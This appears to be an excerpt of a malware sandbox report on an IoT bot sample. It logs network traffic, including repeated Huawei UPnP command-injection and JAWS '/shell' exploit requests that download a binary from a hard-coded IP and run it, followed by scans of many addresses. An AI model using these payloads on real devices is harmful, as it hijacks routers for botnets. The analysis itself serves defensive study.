3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: /tmp/z0r0.spc.elf (PID: 5821)Socket: 127.0.0.1:46157Jump to behavior
              Source: unknownTCP traffic detected without corresponding DNS query: 129.98.8.49
              Source: unknownTCP traffic detected without corresponding DNS query: 200.146.125.49
              Source: unknownTCP traffic detected without corresponding DNS query: 170.144.61.73
              Source: unknownTCP traffic detected without corresponding DNS query: 150.92.232.7
              Source: unknownTCP traffic detected without corresponding DNS query: 120.162.219.46
              Source: unknownTCP traffic detected without corresponding DNS query: 31.166.118.47
              Source: unknownTCP traffic detected without corresponding DNS query: 140.167.23.67
              Source: unknownTCP traffic detected without corresponding DNS query: 199.182.0.76
              Source: unknownTCP traffic detected without corresponding DNS query: 161.154.40.2
              Source: unknownTCP traffic detected without corresponding DNS query: 177.70.98.184
              Source: unknownTCP traffic detected without corresponding DNS query: 82.185.240.35
              Source: unknownTCP traffic detected without corresponding DNS query: 77.77.83.106
              Source: unknownTCP traffic detected without corresponding DNS query: 71.253.136.106
              Source: unknownTCP traffic detected without corresponding DNS query: 9.132.198.210
              Source: unknownTCP traffic detected without corresponding DNS query: 23.180.33.1
              Source: unknownTCP traffic detected without corresponding DNS query: 44.89.104.81
              Source: unknownTCP traffic detected without corresponding DNS query: 180.208.106.117
              Source: unknownTCP traffic detected without corresponding DNS query: 171.253.49.21
              Source: unknownTCP traffic detected without corresponding DNS query: 223.251.166.239
              Source: unknownTCP traffic detected without corresponding DNS query: 168.197.36.50
              Source: unknownTCP traffic detected without corresponding DNS query: 190.182.109.88
              Source: unknownTCP traffic detected without corresponding DNS query: 180.78.103.148
              Source: unknownTCP traffic detected without corresponding DNS query: 46.250.175.108
              Source: unknownTCP traffic detected without corresponding DNS query: 44.155.228.66
              Source: unknownTCP traffic detected without corresponding DNS query: 122.50.163.119
              Source: unknownTCP traffic detected without corresponding DNS query: 136.55.42.11
              Source: unknownTCP traffic detected without corresponding DNS query: 154.85.65.46
              Source: unknownTCP traffic detected without corresponding DNS query: 200.196.8.211
              Source: unknownTCP traffic detected without corresponding DNS query: 164.142.192.207
              Source: unknownTCP traffic detected without corresponding DNS query: 165.249.38.136
              Source: unknownTCP traffic detected without corresponding DNS query: 143.239.97.29
              Source: unknownTCP traffic detected without corresponding DNS query: 180.224.139.179
              Source: unknownTCP traffic detected without corresponding DNS query: 164.137.162.251
              Source: unknownTCP traffic detected without corresponding DNS query: 187.150.12.11
              Source: unknownTCP traffic detected without corresponding DNS query: 13.201.182.230
              Source: unknownTCP traffic detected without corresponding DNS query: 206.244.37.21
              Source: unknownTCP traffic detected without corresponding DNS query: 218.238.190.219
              Source: unknownTCP traffic detected without corresponding DNS query: 104.129.170.155
              Source: unknownTCP traffic detected without corresponding DNS query: 75.64.20.205
              Source: unknownTCP traffic detected without corresponding DNS query: 53.219.214.78
              Source: unknownTCP traffic detected without corresponding DNS query: 71.140.188.144
              Source: unknownTCP traffic detected without corresponding DNS query: 138.119.215.28
              Source: unknownTCP traffic detected without corresponding DNS query: 183.158.88.190
              Source: unknownTCP traffic detected without corresponding DNS query: 130.70.56.197
              Source: unknownTCP traffic detected without corresponding DNS query: 80.194.220.75
              Source: unknownTCP traffic detected without corresponding DNS query: 94.86.77.0
              Source: unknownTCP traffic detected without corresponding DNS query: 212.98.151.177
              Source: unknownTCP traffic detected without corresponding DNS query: 35.128.194.32
              Source: unknownTCP traffic detected without corresponding DNS query: 128.125.86.157
              Source: unknownTCP traffic detected without corresponding DNS query: 135.64.29.32
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
